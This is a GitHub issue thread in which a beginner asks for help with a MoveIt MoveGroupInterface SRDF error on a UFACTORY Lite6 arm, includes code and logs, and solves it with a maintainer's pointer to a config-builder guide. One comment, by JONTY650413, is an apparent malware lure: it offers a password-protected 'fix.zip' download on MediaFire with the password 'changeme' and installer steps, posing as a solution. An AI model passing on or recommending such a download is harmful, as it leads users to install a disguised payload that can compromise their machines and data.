xArm-Developer/xarm_ros2 #92: Creating a MoveGroup Interface for Ufactory Lite6

WhySoZed, 2024-08-26:
Hi,
first of all I'm an absolute beginner in ros and I'm trying to setup some basis to control the lite6 via C++-Code. I also want to use a Stereo Camera later to detect a ball for the robot to work with. 

I followed every step of the instructions to setup the xarm_api and am now able to successfully launch:
ros2 launch xarm_moveit_config lite6_moveit_realmove.launch.py robot_ip:=192.168.1.186

Next i followed a MoveIt Tutorial: https://moveit.picknik.ai/humble/doc/tutorials/your_first_project/your_first_project.html

In it I created a new ros package and started coding:
first i create a ros node called 'node'
now i try to create a MoveIt MoveGroup Interface:

```
#include <memory>

#include <rclcpp/rclcpp.hpp>
#include <moveit/move_group_interface/move_group_interface.h>

int main(int argc, char * argv[])
.
.
.
using moveit::planning_interface::MoveGroupInterface;
auto move_group_interface = MoveGroupInterface(node, "lite6");
.
.
.
```

in one terminal i launched ros2 launch xarm_moveit_config lite6_moveit_realmove.launch.py robot_ip:=192.168.1.186
in another i try to run my code and get this error:
```
~/dev_ws$ ros2 run hello_moveit hello_moveit
[ERROR] [1724679707.081981219] [hello_moveit]: Could not find parameter robot_description_semantic and did not receive robot_description_semantic via std_msgs::msg::String subscription within 10.000000 seconds.
Error:   Could not parse the SRDF XML File. Error=XML_ERROR_EMPTY_DOCUMENT ErrorID=13 (0xd) Line number=0
         at line 732 in /home/loya/ws_moveit2/src//src/model.cpp
[ERROR] [1724679707.091579783] [moveit_rdf_loader.rdf_loader]: Unable to parse SRDF
[FATAL] [1724679707.092582983] [move_group_interface]: Unable to construct robot model. Please make sure all needed information is on the parameter server.
terminate called after throwing an instance of 'std::runtime_error'
  what():  Unable to construct robot model. Please make sure all needed information is on the parameter server.
[ros2run]: Aborted
```

I understood that the second parameter of the MoveGroupInterface constructor should contain the name of the Planning Group and found that in the MoveIt UI
[image]

So maybe its a problem with my moveit installation: I have two workspaces 
1. 'dev_ws' in which the xarm_api is installed and where i create the package i now try to configure for the lite6.
2. 'ws_moveit2' in which i followed every step of the MoveIt Tutorial till the end of the linked page.

In my terminal I only sourced my ros installation and the 'dev_ws' workspace. 
I don't understand why MoveGroupInterface seems to try to parse something in the 'ws_moveit2' workspace.
Do I have to install something extra in the dev_ws workspace to use MoveIt like this?

Thank you for reading my issue.

JONTY650413, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

gaspatxo, 2024-08-26:
I recommend avoiding the builtin package and using the recently created `MovietConfigsBuilder` created. Check this internal guide [https://github.com/xArm-Developer/xarm_ros2/issues/87](https://github.com/xArm-Developer/xarm_ros2/issues/87)

WhySoZed, 2024-08-27:
that works
thank you

closed 2024-08-27 by WhySoZed